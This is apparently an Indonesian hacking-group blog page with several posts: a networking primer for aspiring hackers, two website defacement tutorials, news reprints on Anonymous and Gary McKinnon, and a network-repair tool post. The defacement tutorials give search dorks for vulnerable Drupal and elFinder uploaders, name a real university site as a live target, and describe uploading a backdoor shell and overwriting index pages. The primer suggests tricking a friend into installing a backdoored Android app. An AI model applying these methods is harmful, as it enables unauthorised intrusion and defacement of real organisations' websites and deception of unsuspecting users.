HELOO GT72 LOVERS

BLOG MATI GAIS, BUKAN RESMI BLOG GARUDA TERSAKTI 72 :))

kami mempunyai website resmi dan alamat blog sendiri, bisa cek dibawah :))
http://garudatersakti72.id

salam
Owner&Fonder Garuda Tersakti 72

contact me :
admin@garudatersakti72.id

By: TN72 On Desember 25, 2019

Continue Reading

Belajar Menjadi Hacker : Jaringan dasar yang wajib kamu kuasai

Dalam praktik lapangan, tanpa mengenal ilmu jaringan agak mustahil bagi Calon Hacker untuk melakukan peretesan, apalagi jika targetnya tidak berada di jaringan yang sama, maka semakin banyak pula yang harus diketahui si hacker tentang ilmu jaringan komputer.
Pada kesempatan kali ini MeretasDC akan membahas jaringan dasar minimal yang harus dikuasai jika anda ingin belajar menjadi Hacker. pertama :


IP address atau Internet Protocol Address adalah sistem peng-alamatan suatu perangkat dengan menggunakan angka sebagai identitas. IP ADDRESS sudah pernah dibahas lengkap pada artikel Pengertian IP Address .
Jaman sekarang semua perangkat digital telah diberikan kartu jaringan sehingga dapat memiliki ip addressnya masing masing, itu sebabnya semua perangkat tersebut dapat berkomunikasi satu sama lain melalui jaringan internet.
IP address yang biasa digunakan umumnya terbagi menjadi tiga kelas, yaitu:
Kelas A: 1.0.0.0 – 126.255.255.255
Kelas B: 128.0.0.0 – 191.255.255.255
Kelas C: 192.0.0.0 – 223.255.255.255
(yang bercetak tebal adalah Network, dan yang tidak adalah bagian Host.)
Pemilihan kelas IP Address untuk jaringan lokal biasanya didasari oleh jumlah network dan hostnya. (silahkan baca artikel pengertian IP Address untuk memahami apa itu network dan host). Misalnya perusahaan MDC hanya memiliki 2 cabang dan untuk setiap cabangnya dibutuhkan banyak sekali IP Address maka yang dipilih adalah kelas A karena jumlah hostnya yang sangat besar .
Misalnya lagi perusahaan MRTS memiliki cabang yang banyak sekali namun tiap cabangnya hanya memerlukan sedikit sekali ip maka kelas C bisa jadi pilihan karena jumlah networknya yang besar dan hostnya yang sedikit.
IP address yang banyak dipakai saat ini adalah versi 4 , penulisannya seperti yang kita bisa liat di atas. meskipun bisa menghasilkan milyaran angka ternyata jumlah IP Address tersebut terbatas dan dianggap kurang jika dibandingkan dengan jumlah manusia saat ini.
Oleh karenanya sistem membuat agar ada IP Address yang bisa diulang dan diulang lagi pada jaringan lokal masing-masing tempat.
IP Address tersebut disebut IP lokal. tentu saja IP Address tersebut tidak dapat di gunakan sebagai identitas di Internet. tujuan pembuatan ip lokal adalah agar kebutuhan ip address disemua perangkat terpenuhi.
ini contoh dari ip address yang biasanya di pakai di jaringan lokal :
10.0.0.0 – 10.255.255.255
172.16.0.0 – 172.31.255.255
192.168.0.0 – 192.168.255.255
Lalu bagaimana caranya agar jaringan lokal tadi bisa terhubung ke internet ?
Untuk dapat berkomunikasi ke Internet ip lokal tadi harus dirubah kedalam bentuk IP Public menggunakan bantuan perangkat NAT .
Sampai disini setidaknya kita bisa membedakan yang mana IP LOKAL dan yang mana IP PUBLIC.

Belajar NAT

NAT atau Network Address Translation adalah sebuah sistem yang berfungsi untuk membuat IP lokal anda menjadi diwakili oleh satu IP Address yang lain.
Dalam networking fungsi NAT digunakan agar jaringan lokal kita terhubung dengan jaringan internet. Nat ini merupakan salah satu fitur didalam router.

Misal di sebuah kantor A (ip public 36.66.228.222) anda memakai komputer dengan ip lokal 192.168.1.19 untuk browsing, maka ip address anda dan teman teman satu kantor anda yang terdeteksi di internet adalah ip public kantor anda yaitu 36.66.228.222
Dengan kata lain di Internet ip lokal tersebut diwakilkan oleh IP Public.
lalu bagaimana caranya agar koneksi dari luar bisa di arahkan ke salah satu komputer kita yang menggunakan IP Lokal ?
hal ini sering ditanyakan oleh calon hacker yang mencoba metasploit dan tool-tool pentest lainnya.
Jawabnya, NAT dapat pula ditugaskan untuk menangani hal tersebut. misalnya dengan melakukan port forwarding akan membuat koneksi dari luar yang mengakses ke ip publik akan diteruskan ke ip lokal yang anda tentukan beserta dengan portnya.

PORT

Kita sudah mengetahui fungsi dari IP Address yaitu sebagai identitas perangkat. nah port adalah turunan dari identitas perangkat itu yang biasanya mewakili service-service yang ada di perangkat tersebut.
port di tulis dibelakang ip address dan dipisahkan tanda “titik dua” seperti ini,
192.168.1.5:5900 , dimana 5900 adalah port dari service VNCSERVER.
analoginya IP address merupakan alamat sebuah apartement lalu port adalah nomer-nomer apartment nya.
Di apartment 22 ada ibu bernama sisih yang kerjanya jalan jalan dan selalu menggunakan baju berlapis lapis. sedangkan apartment 80 ada bapak wowo pemilik tokobuku. maka kalau anda mencari buku anda harus menuju kamar 80.
Sedikitnya ini port default yang sebaiknya anda ingat
20 FTP
21 FTP
22 SSH
23 Telnet
25 SMTP
53 DNS
80 HTTP
88 Kerberos
110 POP3
123 NTP
135 Microsoft’s RPC
137-139 Microsoft’s NetBIOS
143 IMAP
161 SNMP
389 LDAP
443 HTTPS or HTTP over SSL
445 SMB
514 syslog
3389 RDP
5900 VNCSERVER
5901 VNCSERVER
Penomoran port tersebut tertulis seperti diatas secara default, namun administrator jaringan bisa saja menggantinya dengan angka lain dengan alasan keamanan.
Biasanya Hacker menggunakan tool tambahan untuk melihat port apa saja yang terbuka dengan menggunakan nmap sehingga service apa saja yang dijalankan di mesin target dapat diketahui.
Contohnya, pada service http data yang berlalu lalang tidak terenkripsi sehingga memiliki kerentanan terhadap tool pemantau data seperti Wireshark, dalam hal ini password atau data sensitif yang anda unggah bisa jadi sedang diawasi oleh hacker. Teknik tersebut biasa disebut dengan SNIFFING. Berbeda dengan http, https melakukan enkripsi sehingga lebih aman.

Mengerti DHCP

Dynamic Host Configuration Protocol adalah protokol yang berfungsi untuk membagikan atau meminjamkan alamat IP Address secara otomatis kepada client komputer yang terhubung.
Jika jaringan kita tidak memiliki DHCP Server maka dibutuhkan settingan manual pada tiap-tiap komputer yang ada di jaringan tersebut.
Dengan menggunakan server dhcp maka alamat ip yang akan di bagikan akan dinamis atau berubah-ubah sesuai range yang di atur sang administrator, mekanisme inilah yang diterapkan pada pembagian IP Jaringan Seluler atau ISP (Internet Service Provider) yang tidak memberikan fitur ip public statis seperti speedy, indihome dsb.
Jadi pada umumnya ip public yang didapatkan dari ISP akan berubah ubah atau tidak tetap.
sedangkan anda membutuhkan ip public statis untuk menjadi server di internet.
Contoh kasus : Dengan tipu daya psikologi yang anda miliki anda berhasil membujuk agar teman anda menginstall aplikasi android yang sejatinya mengandung backdoor. Pada backdoor tersebut telah anda setting LHOST sesuai IP PUBLIC anda.
(anda bisa mengecek ip public di whatismyip)
Maka mungkin anda berhasil mengeksploitasi target untuk sementara waktu, tetapi pada kesempatan berikutnya ternyata IP PUBLIK anda berubah karena IP tersebut merupakan IP Public yang Dinamis. Otomatis backdoor yang tertanam menjadi tidak berguna karena konfigurasinya menuju IP yang sudah berbeda.

Dalam belajar menjadi Hacker, prosesnya cukup panjang. Poin-poin yang dibahas diatas hanya sebagai pembuka saja. Artinya anda harus mendalaminya lagi satu persatu.

By: XT72-ID On Agustus 22, 2018

Continue Reading

Deface Metode Drupal Hidden Uploader

Deface Metode Drupal Hidden Uploader

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Drupal Hidden Uploader

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bagi kalian yang suka upload upload atau baru pertama belajar deface kali kalian bisa gunakan metode Drupal Hidden Uploader

Disini Saya Akan Menulis Artikel yang berjudul "Drupal Hidden Uploader" Langsung saja ke tutorialnya..

Bahan Bahan:

Dork : - Allowed file types: png gif jpg txt. site:gov
           - Allowed file types: png gif jpg txt. site:edu
           - Allowed file types: png gif jpg txt. site:(domain negara yang anda inginkan)
              Kembangi lagi biar Cr00zt

Script Deface : Disini

Step By Step :

Dorking Dulu Lalu Pilih salah satu Web..
    Live Target : http://kripik-scifimas.fpik.unsoed.ac.id/registration_presentation_type

Truss Cari Tempat Upload di bawah..

Example :

kalian tinggal upload file kalian nanti akan seperti ini :

Tinggal klik deh File kalian nanti akan direct sendiri ke file kalian 😊

Live Target Tadii :
http://kripik-scifimas.fpik.unsoed.ac.id/sites/default/files/webform/nembak.html

Sekianlah Postingan Dari XT72-ID tentang "Deface Metode Drupal Hidden Uploader" Semoga Bisa Bermanfaat!.

By: XT72-ID On Maret 28, 2018

Continue Reading

Cara Deface Metode Elfinder Webhost

Selamat pagi kawan di zona waktu canada dan US, gw akan membagikan tutorial dari blog GARUDA TERSAKTI 72, yang sudah sangat banyak yang menggunakan tutorial ini, disini gw menggunakan mass Exploiter dari mas Agus, Founder sekaligus CEO IndoXploit, Oke langsung saja pada tutorialnya..

Pertama kalian harus mempunyai site untuk mengupload mas Exploiternya jika tidak punya bisa menggunkan Xampp jika tidak punya bisa gunakan punya gw

Script: Elfinder Auto Xploiter [ Mass Xploiter ]
Site: Elfinder Auto Xploiter [ Mass Xploiter ]

Tahap selanjutnya kita harus mencari target, di google
Dork:
  1) site:id.ai 
  2) site:cc.vg 
  3) site:wp.lc 
  4) site:uk.ht 
  5) site:ye.vc
  6) site:website.pl 
  7) site:ws.gy 
  8) site:site.bz 
  9) site:xx.tn 
 10) site:freewebsite.biz 
 11) site:t15.org
12) site:allalla.com
13) site:vns.me
14) site:smart-hosting.info
15) site:uhostfull.com
16) site:boxhost.me
17) site:bugs3.com
18) site:tom1.net
19) site:tuars.com / site:tuars.net / site:tuars.co
20) site:freeserver.me

Tahap berikutnya kita harus memasukkan exploit untuk mengetahui vuln atau tidaknya web tersebut..

Exploit: /_file-manager/php/connector.php Atau  /file_manager/php/connector.php

Maka site.com/exploit || site.com/_file-manager/php/connector.php || site.com /_file-manager/php/connector.php

Nah jika kalian mendapatkan {"error":["errUnknownCmd"]} saat memasukkan exploit kemungkinan besar web tersebut vuln, saatnya kita masukkan pada mas exploiternya (diatas)
Masukkan semuanya termasuk exploitnya contoh saat dimasukkan ke Mas exploit
site.com/_file-manager/php/connector.php  Jika Success maka akan ada tulisan seperti dibawah ini

[+] http://vemigisyv.smart-hosting.info//_file-manager/php/connector.php 
# Upload[1] ......
# Upload Success 1... => k.php
# Coba buka di ../../elfinder/files/...

Untuk Melihatnya,contoh site.com/k.php, http://vemigisyv.smart-hosting.info/k.php
Jika sudah ke k.php kalian Upload shell Backdoor kemudian upload script deface atau tebas index mari kita pelajari..

Setelah teruploadnya shell backdoor agan harus cari biasanya Index.php lalu klik edit ubah scritp yang tertera dengan script deface agan..

Maka hasilnya seperti ini

Oke sekian tutorial mengenai Cara Deface Metode Elfinder Webhost, semoga dapat menambah ilmu dibidang hacking khusunya deface :) hanya untuk pemebelajaran tidak ada maksud mengajarkan kerusakan namun bagaimana cara kita sesudah mempelajari, memahami dapat mencegah hal deface tersebut pada web kita sendiri :)

By: XT72-ID On Maret 28, 2018

Continue Reading

Karena Lumba-lumba, Hacker Lumpuhkan Website Bandara Narita

Jakarta, CNN Indonesia -- Grup peretas Anonymous nyatanya melakukan serangan siber tak hanya untuk memberantas aksi kelompok militan ISIS, namun juga sebagai "balas dendam" dari suatu tindakan yang dinilai bertentangan dengan pendapat mereka. Kali ini, bandar udara Narita di Jepang jadi target sasaran.

Situs web bandara internasional Narita di dekat Tokyo sempat offline pada akhir pekan kemarin, yakni 22-23 Januari, selama beberapa jam. Hal ini membuat banyak penumpang tidak bisa mengakses informasi penerbangan.

Operator bandara mengkonfirmasi bahwa situs mereka menjadi korban serangan Distributed Denial of Service (DDos) karena situs diserbu oleh lalu lintas buatan. 

Sebuah akun Twitter yang terkait Anonymous dengan nama pengguna @_RektFaggot_, mengklaim telah melumpuhkan situs bandara Narita. Aksi peretasan ini dilakukan sebagai bentuk protes terhadap aksi warga Jepang yang memburu lumba-lumba serta bentuk perlawanan terhadap pihak otoritas imigrasi bandara Narita yang menahan aktivis hak hewan Richard O'Barry dari Amerika Serikat.

O'Barry yang tiba di Narita pada 18 Januari lalu dituduh oleh otoritas imigrasi bahwa ia punya rencana menggalang kampanye melawan pembantaian lumba-lumba. Selain menjadi aktivis, O'Barry juga terlibat dalam pembuatan film dokumenter "The Cove" pada 2009 silam yang menginvestigasi pembantaian lumba-lumba di Taiji.

Jepang dikenal sebagai negara yang membantai lumba-lumba demi seonggok dagingnya. Daerah Taiji merupakan sumber penangkapan lumba-lumba yang dilakukan setiap tahun.

Di sana, lumba-lumba digiring dari lautan terbuka menuju perairan dangkal. Para nelayan langsung membunuhnya menggunakan tongkat berbahan logam. Setiap tahun tercatat sebanyak 20 ribu lumba-lumba serta paus kecil dibunuh oleh warga Jepang.

"Mematikan situs web bandara Jepang sebagai perlawanan dari penahanan Richard O'Barry," tulis kelompok Anonymous.
Sebelumnya pada Desember 2015, Anonymous juga sempat meretas situs perusahaan Trump Towers sebagai aksi mengecam komentar anti-Islam yang dilontarkan Donald Trump.

Masih di bulan yang sama, Anonymous juga bertanggung jawab atas serangan siber yang meruntuhkan puluhan ribu situs Turki. Menggunakan serangan DDoS, Anonymous menargetkan banyak situs web asal Turki yang domain Internet-nya berakhiran .tr.

Hal tersebut bermula dari tudingan Presiden Rusia Vladimir Putin yang mengatakan bahwa kota Ankara menampung hasil minyak selundupan ISIS.

By: XT72-ID On Maret 28, 2018

Continue Reading

Retas NASA, Hacker Klaim Temukan Bukti Alien dan UFO

Hal itu diungkapkan oleh hacker yang telah berhasil membobol sistem NASA. Dan bukan cuma itu, hacker bernama Gary McKinnon ini juga berhasil menyusup ke sistem milik Angkatan Udara dan Angkatan Laut Amerika Serikat. Akibat perbuatannya ia harus menjalani berbagai proses hukum selama 10 tahun terakhir.
“Pakar fotografi NASA mengatakan di Building 8 di Johnson Space Center, mereka punya gambar foto UFO yang tertangkap satelit berkualitas dengan resolusi tinggi. Saya login ke NASA dan masuk. Mereka punya gambar itu,” kata McKinnon.Dalam sebuah wawancara dengan saluran YouTube Richplanet TV, McKinnon mengaku menemukan banyak foto asli yang disimpan NASA. Foto tersebut tidak seperti yang dilihat publik, karena sebelum dirilis sudah melewati beberapa kali proses penyuntingan gambar.

Sebagian foto yang ditemukan McKinnon membuat objek aneh yang ia simpulkan sebagai alien, UFO atau objek antariksa lainnya yang memang tidak boleh diketahui oleh publik. Objek itu sengaja dihilangkan sebelum foto-foto dirilis.

McKinnon sendiri memang salah satu peretas kawakan yang diringkus pihak berwajib AS pada 2002 atas tuduhan menyusup ke dalam sistem komputer pemerintah. Saat itu ia membuat kerusakan yang membuat sistem lumpuh selama 13 bulan.

By: XT72-ID On Maret 28, 2018

Continue Reading

Cara Memperbaiki Masalah Koneksi Internet/Jaringan

Kadang kala kita sering kali dibuat bingung jika koneksi internet atau jaringan kita terputus tiba-tiba. Apalagi yang masih belum tau apa-apa tentang masalah jaringan, seperti saya ini. Nah, untuk mengatasi  masalah koneksi internet/jaringan yang tiba-tiba ngadat atau terputus, kita bisa menggunakan software yang bisa memperbaiki masalah koneksi internet/jaringan, namanya"Complete Internet Repair".

Software gratis dan juga portable ini berfungsi mereset, merestore (mengembalikan ke pengaturan awal), membersihkan (clear) dan juga beberapa fitur perbaikan (repair) komputer yang berkaitan dengan jaringan/internet lainnya. Jadi software ini bisa menjadi solusi awal untuk memperbaiki masalah koneksi internet/jaringan. Beberapa fiturnya antara lain :

• Reset Internet Protocol (TCP/IP)
• Repair Winsock (Reset Catalog)
• Renew Internet Connections
• Flush DNS Resolver Cache
• Clear Windows Update History
• Repair Windows / Automatic Updates
• Reset Windows Firewall configuration
• Repair SSl/HTTPS/Cryptography
• Restore the default hosts file
• Repair Workgroup Computer View

Kapan software ini bermanfaat bagi kita ? Pembuat software ini menuliskan beberapa permasalahan yang bisa diperbaiki dengan tools ini, seperti misalnya :

• Internet atau jaringan bermasalah setelah antivirus atau program security menghapus adware, spyware, virus, worm, trojan horse dan sebagainya
• Kehilangan koneksi jaringan setelah menginstall atau uninstal adware,spyware,antisam, vpn, firewall atau program jaringan lainnya
• Tidak bisa mengakses halaman website atau hanya bisa mengakses sebagian website saja
• Muncul pesan error dengan keterangan bahwa jaringan (network) bermasalah
• Tidak ada koneksi jaringan karena registry error
• permasalahan dengan DNS (Domain name system)
• Gagal (fail) ketika akan memperbaiki (repair) alamat IP atau error DHCP lainnya
• Konektivias jaringan bermasalah dengan pesan informasi: limited or no connections
• Windows Update tidak berjalan
• ketika bermasalah untuk mengakses website dengan security misalnya internet banking
• Internet explorer senantiasa error (crash)
• berbagai masalah jaringan lainnya

Penggunaannya cukup mudah, tinggal pilih masalah yang dihadapi selanjutnya klik Go. Yang mungkin tidak mudah adalah mencari akar permasalahan yang terjadi dengan sistem komputer kita dan opsi mana yang harus dipilih untuk memperbaiki koneksi jaringan. Sekedar tips, secara umum pilihan 2,3 dan 4 bisa dipilih untuk memperbaiki jika koneksi jaringan/internet bermasalah. Pilihan pertama juga bisa ditambahkan, tetapi catat dulu konfigurasi IP kita (jika settingnya diatur secara manual) untuk berjaga-jaga.

Satu hal yang juga perlu diperhatikan adalah gunakan software ini jika terjadi masalah dengan koneksi internet/jaringan saja. Jika koneksi jaringan atau internet berjalan normal (tidak ada masalah), maka kita tidak perlu menggunakan software ini.

Download : Complete Internet Repair

By: XT72-ID On Maret 28, 2018

Continue Reading